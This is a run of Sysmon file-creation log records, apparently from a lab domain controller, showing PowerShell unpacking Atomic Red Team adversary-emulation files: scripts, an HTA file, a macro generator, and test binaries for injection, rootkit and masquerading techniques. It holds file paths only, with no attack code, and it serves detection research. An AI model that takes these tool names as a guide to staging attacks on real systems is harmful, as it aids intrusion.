{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4698,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:32.999\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_DragonsTail.bat\r\nCreationUtcTime: 2020-08-01 05:52:32.999","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:32.999","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_DragonsTail.bat","CreationUtcTime":"2020-08-01 05:52:32.999","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4699,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:32.999\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_DragonsTail.ps1\r\nCreationUtcTime: 2020-08-01 05:52:32.999","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:32.999","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_DragonsTail.ps1","CreationUtcTime":"2020-08-01 05:52:32.999","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4700,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:32.999\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Fission.bat\r\nCreationUtcTime: 2020-08-01 05:52:32.999","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:32.999","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Fission.bat","CreationUtcTime":"2020-08-01 05:52:32.999","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4701,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:32.999\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Plutonium.bat\r\nCreationUtcTime: 2020-08-01 05:52:32.999","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:32.999","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Plutonium.bat","CreationUtcTime":"2020-08-01 05:52:32.999","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4702,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:32.999\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Reactor.bat\r\nCreationUtcTime: 2020-08-01 05:52:32.999","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:32.999","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\chain_reaction_Reactor.bat","CreationUtcTime":"2020-08-01 05:52:32.999","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4703,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.015\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\dragonstail_benign.ps1\r\nCreationUtcTime: 2020-08-01 05:52:33.015","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.015","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\dragonstail_benign.ps1","CreationUtcTime":"2020-08-01 05:52:33.015","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4704,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.015\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\qbot_infection_reaction.vbs\r\nCreationUtcTime: 2020-08-01 05:52:33.015","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.015","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Chain_Reactions\\qbot_infection_reaction.vbs","CreationUtcTime":"2020-08-01 05:52:33.015","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4705,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.030\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Initial_Access\\AtomicHTA.hta\r\nCreationUtcTime: 2020-08-01 05:52:33.030","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.030","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Initial_Access\\AtomicHTA.hta","CreationUtcTime":"2020-08-01 05:52:33.030","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4706,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.030\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Initial_Access\\generate-macro.ps1\r\nCreationUtcTime: 2020-08-01 05:52:33.030","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.030","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Initial_Access\\generate-macro.ps1","CreationUtcTime":"2020-08-01 05:52:33.030","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4707,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.030\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Labs\\Webinar11062017-Labs.bat\r\nCreationUtcTime: 2020-08-01 05:52:33.030","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.030","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Labs\\Webinar11062017-Labs.bat","CreationUtcTime":"2020-08-01 05:52:33.030","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4708,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.030\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Misc\\Discovery.bat\r\nCreationUtcTime: 2020-08-01 05:52:33.030","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.030","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\ARTifacts\\Misc\\Discovery.bat","CreationUtcTime":"2020-08-01 05:52:33.030","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4709,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 05:52:33.234\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1014\\bin\\puppetstrings.exe\r\nCreationUtcTime: 2020-08-01 05:52:33.234","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 05:52:33.234","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1014\\bin\\puppetstrings.exe","CreationUtcTime":"2020-08-01 05:52:33.234","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4710,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 05:52:33.312\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1027.004\\bin\\T1027.004_DynamicCompile.exe\r\nCreationUtcTime: 2020-08-01 05:52:33.312","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 05:52:33.312","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1027.004\\bin\\T1027.004_DynamicCompile.exe","CreationUtcTime":"2020-08-01 05:52:33.312","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4711,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 05:52:33.343\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\bin\\T1036.003.exe\r\nCreationUtcTime: 2020-08-01 05:52:33.343","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 05:52:33.343","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\bin\\T1036.003.exe","CreationUtcTime":"2020-08-01 05:52:33.343","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4712,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.343\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\src\\T1036.003_masquerading.ps1\r\nCreationUtcTime: 2020-08-01 05:52:33.343","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.343","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\src\\T1036.003_masquerading.ps1","CreationUtcTime":"2020-08-01 05:52:33.343","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4713,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.343\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\src\\T1036.003_masquerading.vbs\r\nCreationUtcTime: 2020-08-01 05:52:33.343","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.343","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\src\\T1036.003_masquerading.vbs","CreationUtcTime":"2020-08-01 05:52:33.343","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4714,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:52:33.343\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\src\\T1036.003_test.bat\r\nCreationUtcTime: 2020-08-01 05:52:33.343","Category":"File created (rule: FileCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:52:33.343","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1036.003\\src\\T1036.003_test.bat","CreationUtcTime":"2020-08-01 05:52:33.343","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4715,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: EXE\r\nUtcTime: 2020-08-01 05:52:33.421\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.004\\bin\\T1055.exe\r\nCreationUtcTime: 2020-08-01 05:52:33.421","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"EXE","UtcTime":"2020-08-01 05:52:33.421","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.004\\bin\\T1055.exe","CreationUtcTime":"2020-08-01 05:52:33.421","EventReceivedTime":"2020-08-01 05:52:34","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:52:33","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":4716,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:52:33.437\r\nProcessGuid: {A837DB8D-0313-5F25-0000-001016DC0600}\r\nProcessId: 3852\r\nImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetFilename: C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.004\\src\\Win32\\T1055.dll\r\nCreationUtcTime: 2020-08-01 05:52:33.437","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:52:33.437","ProcessGuid":"{A837DB8D-0313-5F25-0000-001016DC0600}","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetFilename":"C:\\AtomicRedTeam\\tmp\\atomic-red-team-local-master\\atomics\\T1055.004\\src\\Win32\\T1055.dll","CreationUtcTime":"2020-08-01 